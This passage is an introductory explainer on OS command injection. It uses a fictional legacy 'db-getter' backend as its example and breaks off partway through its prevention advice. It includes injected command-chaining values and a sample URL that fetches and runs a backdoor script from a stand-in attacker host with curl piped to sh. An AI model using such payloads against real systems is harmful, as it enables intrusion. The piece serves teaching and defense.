OS command injection

Overview

OS command injection, also known as shell injection is a web security issue, that allows an attacker to execute operating system commands on the computer that is running the application. This usually compromises the application and its data. An attacker can also use OS command injection to compromize other parts of the computer, such as trust relationships inside of an organisation. Often times this is a vulnerability because of legacy code.

Example

An application could request the following url:

https://insecure-website.com/products?category=Gifts

And due to a legacy database system, instead of using a sql query, it would use a seperate application on the host system. In our example case, this is db-getter. A fictionary tool that gets entries out of a database.

After the request from earlier, the backend now executes the following command:

db-getter * products category=Gifts

An attacker could now just request this url:

https://insecure-website.com/products?category=Gifts&echo+"hello+world"

which would execute:

db-getter * products category=Gifts&&echo "Hello world"

This would now return the database entries, but afterwards it would run echo "Hello world". In this case, this is not malicious just yet, but for examle, we could request a malicious shell script from another server:

https://insecure-website.com/products?category=Gifts&$(curl+https://web-attacker.com/backdoor.sh | sh)

Prevent OS command injection

If this vulnerability is found on one of your systems, it is generally good practice to update this legacy infrastrucutre. Instead of using OS commands, rather use an API.

If you need to call out to OS commands with user-supplied input, then you must perform a strong input validation. For example: